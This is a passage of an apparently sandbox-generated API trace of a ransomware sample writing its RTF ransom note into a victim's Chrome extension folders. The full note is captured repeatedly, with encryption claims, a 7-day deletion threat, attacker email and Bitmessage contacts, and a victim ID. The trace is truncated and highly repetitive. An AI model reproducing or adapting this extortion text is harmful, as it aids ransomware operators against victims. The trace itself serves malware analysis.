}}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8bd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.181] WriteFile (in: hFile=0x2e8, lpBuffer=0x1ef8bd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8bd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.183] CloseHandle (hObject=0x2e8) returned 1 [0292.184] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\#readme_eman#.rtf")) returned 0xffffffff [0292.184] GetLastError () returned 0x2 [0292.184] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.184] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.184] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 